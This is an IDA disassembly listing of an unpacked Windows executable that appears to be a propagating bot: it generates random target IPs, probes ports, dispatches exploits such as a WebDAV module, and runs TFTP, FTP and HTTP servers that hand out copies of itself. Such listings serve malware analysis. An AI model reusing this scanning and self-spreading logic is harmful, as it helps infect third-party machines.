;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 102C9614F96D350AB5C52E1A79C11862
; File Name : u:\work\102c9614f96d350ab5c52e1a79c11862_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00082000 ( 532480.)
; Section size in file : 00082000 ( 532480.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; CODE XREF: sub_409806+5292�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_416905
cmp dword_42E068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42E070
loc_401033: ; CODE XREF: start+6B�j
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_416905
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_4167D0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: start+2B�j
push dword_480AB8
call sub_41296D
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_416905
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_4167D0
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
lea eax, [ebp+var_200]
push eax
call sub_401ECD
add esp, 38h
pop edi
pop ebx
leave
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CA proc near ; CODE XREF: sub_409806+4BC1�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_4138A6
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ebp+arg_C]
push dword_4331C0[eax*8]
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_416905
add esp, 0Ch
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_401106: ; CODE XREF: sub_4010CA+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_416905
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
lea eax, [ebp+var_200]
push eax
call sub_401ECD
add esp, 18h
leave
retn
sub_4010CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401B65+4F�p
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
cmp eax, 0FFFFFFFFh
jz locret_4014DA
imul eax, 3Ch
push ebx
xor ebx, ebx
cmp dword_42E074[eax], ebx
push esi
jz loc_4013CB
push 5
call sub_4138A6
test eax, eax
pop ecx
jnz loc_4014D8
mov eax, dword_42FCBC
push edi
push 104h
mov edi, offset dword_4347D4
push edi
push ebx
mov dword_4349E4, eax
mov dword_4349E0, ebx
call dword_42200C ; GetModuleFileNameA
push 103h
push offset byte_42FD48
mov esi, offset dword_4348D8
push esi
call sub_4169C0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4347D0, eax
mov eax, [ebp+arg_138]
mov dword_434A68, eax
push 7Fh
jnz short loc_4011F1
lea eax, [ebp+arg_10]
push eax
push offset dword_4349E8
call sub_4169C0
mov dword_434A6C, 1
jmp short loc_401208
; ---------------------------------------------------------------------------
loc_4011F1: ; CODE XREF: sub_401141+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4349E8
call sub_4169C0
mov dword_434A6C, ebx
loc_401208: ; CODE XREF: sub_401141+AE�j
add esp, 0Ch
push esi
push edi
push dword_4349E4
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_416905
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_4136B6
add esp, 20h
mov dword_4349DC, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4347D0
push offset sub_4131EE
push ebx
push ebx
call dword_422008 ; CreateThread
mov ecx, dword_4349DC
imul ecx, 234h
cmp eax, ebx
mov dword_43B254[ecx], eax
jnz loc_401320
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_416905
add esp, 0Ch
loc_401287: ; CODE XREF: sub_401141+1E7�j
lea eax, [ebp+var_204]
push eax
call sub_401ECD
call sub_41699A
cdq
mov ecx, 0F82Fh
idiv ecx
mov [esp+208h+var_208], 104h
mov edi, offset dword_43452C
push edi
push ebx
mov dword_434738, ebx
add edx, 400h
mov dword_43473C, edx
call dword_42200C ; GetModuleFileNameA
push 103h
push offset byte_42FD48
mov esi, offset dword_434630
push esi
call sub_4169C0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_434528, eax
mov eax, [ebp+arg_138]
mov dword_4347C0, eax
push 7Fh
jnz short loc_40132D
lea eax, [ebp+arg_10]
push eax
push offset dword_434740
call sub_4169C0
mov dword_4347C4, 1
jmp short loc_401344
; ---------------------------------------------------------------------------
loc_401318: ; CODE XREF: sub_401141+1E5�j
push 32h
call dword_422000 ; Sleep
loc_401320: ; CODE XREF: sub_401141+125�j
cmp dword_434A70, ebx
jz short loc_401318
jmp loc_401287
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_401141+1BB�j
lea eax, [ebp+arg_90]
push eax
push offset dword_434740
call sub_4169C0
mov dword_4347C4, ebx
loc_401344: ; CODE XREF: sub_401141+1D5�j
add esp, 0Ch
push esi
push edi
push dword_43473C
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on Port: %d, File"...
push eax
call sub_416905
push ebx
lea eax, [ebp+var_204]
push 6
push eax
call sub_4136B6
add esp, 20h
mov dword_434734, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_434528
push offset sub_404260
push ebx
push ebx
call dword_422008 ; CreateThread
mov ecx, dword_434734
imul ecx, 234h
cmp eax, ebx
mov dword_43B254[ecx], eax
pop edi
jnz short loc_4013BE
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_4014BC
; ---------------------------------------------------------------------------
loc_4013B6: ; CODE XREF: sub_401141+283�j
push 32h
call dword_422000 ; Sleep
loc_4013BE: ; CODE XREF: sub_401141+262�j
cmp dword_4347C8, ebx
jz short loc_4013B6
jmp loc_4014CB
; ---------------------------------------------------------------------------
loc_4013CB: ; CODE XREF: sub_401141+25�j
cmp dword_42E078[eax], ebx
jz loc_4014D8
push 4
call sub_4138A6
test eax, eax
pop ecx
jnz loc_4014D8
push 104h
mov esi, offset dword_434404
push esi
push ebx
call dword_42200C ; GetModuleFileNameA
push 5Ch
push esi
call sub_416960
cmp eax, ebx
pop ecx
pop ecx
jz short loc_401409
mov [eax], bl
loc_401409: ; CODE XREF: sub_401141+2C4�j
mov eax, dword_42FCC0
mov dword_434508, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_43417C
mov dword_43451C, ebx
call sub_416905
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov ecx, [ebp+arg_138]
push esi
push dword_434508
mov dword_434514, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_434178, eax
mov dword_434518, ecx
call sub_408852
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_416905
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_4136B6
add esp, 20h
mov dword_434510, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_434178
push offset sub_405549
push ebx
push ebx
loc_401494: ; DATA XREF: .text:off_4317B8�o
; .text:off_432070�o
call dword_422008 ; CreateThread
mov ecx, dword_434510
imul ecx, 234h
cmp eax, ebx
mov dword_43B254[ecx], eax
jnz short loc_4014E4
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_4014BC: ; CODE XREF: sub_401141+270�j
lea eax, [ebp+var_204]
push eax
call sub_416905
add esp, 0Ch
loc_4014CB: ; CODE XREF: sub_401141+285�j
; sub_401141+3AB�j
lea eax, [ebp+var_204]
push eax
call sub_401ECD
pop ecx
loc_4014D8: ; CODE XREF: sub_401141+35�j
; sub_401141+290�j ...
pop esi
pop ebx
locret_4014DA: ; CODE XREF: sub_401141+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_4014DC: ; CODE XREF: sub_401141+3A9�j
push 32h
call dword_422000 ; Sleep
loc_4014E4: ; CODE XREF: sub_401141+36D�j
cmp dword_434524, ebx
jz short loc_4014DC
jmp short loc_4014CB
sub_401141 endp
; =============== S U B R O U T I N E =======================================
sub_4014EE proc near ; CODE XREF: sub_401950:loc_4019B2�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
lea esi, ds:4331C0h[esi*8]
push dword ptr [esi]
call dword_43A474 ; ntohl
inc eax
push eax
call dword_43A4CC ; ntohl
mov [esi], eax
pop esi
retn
sub_4014EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40150E proc near ; CODE XREF: sub_4017DA+71�p
var_E4 = word ptr -0E4h
var_E2 = word ptr -0E2h
var_E0 = word ptr -0E0h
var_DE = word ptr -0DEh
var_DC = word ptr -0DCh
var_DA = word ptr -0DAh
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = word ptr -0C4h
var_C2 = word ptr -0C2h
var_C0 = word ptr -0C0h
var_BE = word ptr -0BEh
var_BC = word ptr -0BCh
var_BA = word ptr -0BAh
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = word ptr -0B4h
var_B2 = word ptr -0B2h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = word ptr -0ACh
var_AA = word ptr -0AAh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = word ptr -0A4h
var_A2 = word ptr -0A2h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = word ptr -94h
var_92 = word ptr -92h
var_90 = word ptr -90h
var_8E = word ptr -8Eh
var_8C = word ptr -8Ch
var_8A = word ptr -8Ah
var_88 = word ptr -88h
var_86 = word ptr -86h
var_84 = word ptr -84h
var_82 = word ptr -82h
var_80 = word ptr -80h
var_7E = word ptr -7Eh
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = word ptr -70h
var_6E = word ptr -6Eh
var_6C = word ptr -6Ch
var_6A = word ptr -6Ah
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0E4h
xor eax, eax
mov [ebp+74h+var_E4], ax
mov [ebp+74h+var_E2], 1
mov [ebp+74h+var_E0], 2
mov [ebp+74h+var_DE], 5
mov [ebp+74h+var_DC], 7
mov [ebp+74h+var_DA], 0Bh
mov [ebp+74h+var_D8], 17h
mov [ebp+74h+var_D6], 1Bh
mov [ebp+74h+var_D4], 1Fh
mov [ebp+74h+var_D2], 24h
mov [ebp+74h+var_D0], 25h
mov [ebp+74h+var_CE], 27h
mov [ebp+74h+var_CC], 29h
mov [ebp+74h+var_CA], 2Ah
mov [ebp+74h+var_C8], 31h
mov [ebp+74h+var_C6], 32h
mov [ebp+74h+var_C4], 49h
mov [ebp+74h+var_C2], 4Ah
mov [ebp+74h+var_C0], 4Bh
mov [ebp+74h+var_BE], 4Ch
mov [ebp+74h+var_BC], 4Dh
mov [ebp+74h+var_BA], 4Eh
mov [ebp+74h+var_B8], 4Fh
mov [ebp+74h+var_B6], 59h
mov [ebp+74h+var_B4], 5Ah
mov [ebp+74h+var_B2], 5Bh
mov [ebp+74h+var_B0], 5Ch
mov [ebp+74h+var_AE], 5Dh
mov [ebp+74h+var_AC], 5Eh
mov [ebp+74h+var_AA], 5Fh
mov [ebp+74h+var_A8], 60h
mov [ebp+74h+var_A6], 61h
mov [ebp+74h+var_A4], 62h
mov [ebp+74h+var_A2], 63h
mov [ebp+74h+var_A0], 64h
mov [ebp+74h+var_9E], 65h
mov [ebp+74h+var_9C], 66h
mov [ebp+74h+var_9A], 67h
mov [ebp+74h+var_98], 68h
mov [ebp+74h+var_96], 69h
mov [ebp+74h+var_94], 6Ah
mov [ebp+74h+var_92], 6Bh
mov [ebp+74h+var_90], 6Ch
mov [ebp+74h+var_8E], 6Dh
mov [ebp+74h+var_8C], 6Eh
mov [ebp+74h+var_8A], 6Fh
mov [ebp+74h+var_88], 70h
mov [ebp+74h+var_86], 71h
mov [ebp+74h+var_84], 72h
mov [ebp+74h+var_82], 73h
mov [ebp+74h+var_80], 74h
mov [ebp+74h+var_7E], 75h
mov [ebp+74h+var_7C], 76h
mov [ebp+74h+var_7A], 77h
mov [ebp+74h+var_78], 78h
mov [ebp+74h+var_76], 79h
mov [ebp+74h+var_74], 7Ah
mov [ebp+74h+var_72], 7Bh
mov [ebp+74h+var_70], 7Ch
mov [ebp+74h+var_6E], 7Dh
mov [ebp+74h+var_6C], 7Eh
mov [ebp+74h+var_6A], 7Fh
mov [ebp+74h+var_68], 0ADh
mov [ebp+74h+var_66], 0AEh
mov [ebp+74h+var_64], 0AFh
mov [ebp+74h+var_62], 0B0h
mov [ebp+74h+var_60], 0B1h
mov [ebp+74h+var_5E], 0B2h
mov [ebp+74h+var_5C], 0B3h
mov [ebp+74h+var_5A], 0B4h
mov [ebp+74h+var_58], 0B5h
mov [ebp+74h+var_56], 0B6h
mov [ebp+74h+var_54], 0B7h
mov [ebp+74h+var_52], 0B8h
mov [ebp+74h+var_50], 0B9h
mov [ebp+74h+var_4E], 0BAh
mov [ebp+74h+var_4C], 0BBh
mov [ebp+74h+var_4A], 0BDh
mov [ebp+74h+var_48], 0BEh
mov [ebp+74h+var_46], 0C5h
mov [ebp+74h+var_44], 0DFh
mov [ebp+74h+var_42], 0E0h
mov [ebp+74h+var_40], 0E1h
mov [ebp+74h+var_3E], 0E2h
mov [ebp+74h+var_3C], 0E3h
mov [ebp+74h+var_3A], 0E4h
mov [ebp+74h+var_38], 0E5h
mov [ebp+74h+var_36], 0E6h
mov [ebp+74h+var_34], 0E7h
mov [ebp+74h+var_32], 0E8h
mov [ebp+74h+var_30], 0E9h
mov [ebp+74h+var_2E], 0EAh
mov [ebp+74h+var_2C], 0EBh
mov [ebp+74h+var_2A], 0ECh
mov [ebp+74h+var_28], 0EDh
mov [ebp+74h+var_26], 0EEh
mov [ebp+74h+var_24], 0EFh
mov [ebp+74h+var_22], 0F0h
mov [ebp+74h+var_20], 0F1h
mov [ebp+74h+var_1E], 0F2h
mov [ebp+74h+var_1C], 0F3h
mov [ebp+74h+var_1A], 0F4h
mov [ebp+74h+var_18], 0F5h
mov [ebp+74h+var_16], 0F6h
mov [ebp+74h+var_14], 0F7h
mov [ebp+74h+var_12], 0F8h
mov [ebp+74h+var_10], 0F9h
mov [ebp+74h+var_E], 0FAh
mov [ebp+74h+var_C], 0FBh
mov [ebp+74h+var_A], 0FCh
mov [ebp+74h+var_8], 0FDh
mov [ebp+74h+var_6], 0FEh
mov [ebp+74h+var_4], 0FFh
loc_4017BF: ; CODE XREF: sub_40150E+2BF�j
movsx ecx, [ebp+eax*2+74h+var_E4]
cmp [ebp+74h+arg_0], ecx
jz short loc_4017D6
inc eax
cmp eax, 71h
jb short loc_4017BF
xor al, al
loc_4017D1: ; CODE XREF: sub_40150E+2CA�j
add ebp, 74h
leave
retn
; ---------------------------------------------------------------------------
loc_4017D6: ; CODE XREF: sub_40150E+2B9�j
mov al, 1
jmp short loc_4017D1
sub_40150E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017DA proc near ; CODE XREF: sub_401950+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push edi
or edi, 0FFFFFFFFh
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
lea ecx, [eax+1]
loc_4017F6: ; CODE XREF: sub_4017DA+21�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4017F6
sub eax, ecx
cmp eax, 0Fh
jbe short loc_40180B
xor eax, eax
jmp loc_4018B0
; ---------------------------------------------------------------------------
loc_40180B: ; CODE XREF: sub_4017DA+28�j
push esi
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_416AE4
add esp, 18h
cmp [ebp+var_4], edi
jnz short loc_401855
call sub_41699A
mov esi, 0FFh
jmp short loc_401842
; ---------------------------------------------------------------------------
loc_40183D: ; CODE XREF: sub_4017DA+79�j
call sub_41699A
loc_401842: ; CODE XREF: sub_4017DA+61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ebp+var_4], edx
call sub_40150E
test al, al
pop ecx
jnz short loc_40183D
loc_401855: ; CODE XREF: sub_4017DA+55�j
cmp [ebp+var_C], edi
mov esi, 100h
jnz short loc_40186C
call sub_41699A
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_40186C: ; CODE XREF: sub_4017DA+83�j
cmp [ebp+var_8], edi
jnz short loc_40187C
call sub_41699A
cdq
idiv esi
mov [ebp+var_8], edx
loc_40187C: ; CODE XREF: sub_4017DA+95�j
mov edx, [ebp+var_10]
cmp edx, edi
pop esi
jnz short loc_401892
call sub_41699A
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_401892: ; CODE XREF: sub_4017DA+A8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add edx, [ebp+var_C]
shl edx, 8
add eax, edx
mov dword_4331C0[ecx*8], eax
loc_4018B0: ; CODE XREF: sub_4017DA+2C�j
pop edi
leave
retn
sub_4017DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018B3 proc near ; CODE XREF: sub_401950+A9�p
; sub_403FEB+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_43A39C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4018DC
xor eax, eax
jmp short loc_40194B
; ---------------------------------------------------------------------------
loc_4018DC: ; CODE XREF: sub_4018B3+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_43A4F4 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_43A334 ; ioctlsocket
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_43A34C ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_43A448 ; select
push esi
mov edi, eax
call dword_43A4B0 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40194B: ; CODE XREF: sub_4018B3+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4018B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401950 proc near ; DATA XREF: sub_401B65+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call dword_42201C ; GetTickCount
push eax
call sub_41698D
mov ebx, esi
pop ecx
imul ebx, 234h
jmp loc_401B41
; ---------------------------------------------------------------------------
loc_40199C: ; CODE XREF: sub_401950+1FF�j
cmp [ebp+var_10], 0
push eax
jz short loc_4019B2
lea eax, [ebp+var_150]
push eax
call sub_4017DA
pop ecx
jmp short loc_4019B7
; ---------------------------------------------------------------------------
loc_4019B2: ; CODE XREF: sub_401950+51�j
call sub_4014EE
loc_4019B7: ; CODE XREF: sub_401950+60�j
pop ecx
push [ebp+arg_0]
mov edi, eax
push dword_43B244[ebx]
push [ebp+var_3C]
push edi
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_416905
lea eax, [ebp+var_28C]
push eax
lea eax, dword_43B040[ebx]
push eax
call sub_416905
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_4018B3
add esp, 2Ch
cmp eax, 1
jnz loc_401B36
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_401A8B
push offset dword_434160
call dword_422018 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_416905
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_401A6D
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_401A61
lea eax, [ebp+var_140]
loc_401A61: ; CODE XREF: sub_401950+109�j
push eax
push [ebp+var_40]
call sub_405D20
add esp, 14h
loc_401A6D: ; CODE XREF: sub_401950+EE�j
lea eax, [ebp+var_28C]
push eax
call sub_401ECD
mov [esp+2A8h+var_2A8], offset dword_434160
call dword_422014 ; RtlLeaveCriticalSection
jmp loc_401B36
; ---------------------------------------------------------------------------
loc_401A8B: ; CODE XREF: sub_401950+BE�j
push edi
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_416905
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aWebdav ; "webdav"
push eax
lea eax, [ebp+var_178]
push eax
call sub_416905
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_401ACF
lea eax, [ebp+var_140]
loc_401ACF: ; CODE XREF: sub_401950+177�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_416905
mov eax, [ebp+var_40]
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
pop ecx
sub esp, 0BCh
push 2Fh
pop ecx
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
mov edi, esp
rep movsd
call off_42E06C[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_401B36: ; CODE XREF: sub_401950+B4�j
; sub_401950+136�j
push 7D0h
call dword_422000 ; Sleep
loc_401B41: ; CODE XREF: sub_401950+47�j
mov eax, dword_43B244[ebx]
cmp dword_4331C4[eax*8], 0
jnz loc_40199C
push esi
call sub_41397A
pop ecx
push 0
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_401950 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B65 proc near ; DATA XREF: sub_409806+462D�o
; sub_409806+6018�o
var_20C = dword ptr -20Ch
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_14C]
rep movsd
inc ebx
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_43A414 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
mov dword_4331C0[ecx*8], eax
push 53h
pop ecx
lea esi, [ebp+var_14C]
mov edi, esp
rep movsd
call sub_401141
push 9
call sub_4138A6
add esp, 150h
cmp eax, ebx
jnz short loc_401C33
mov esi, offset dword_434160
push esi
call dword_422024 ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_422020 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_401C33
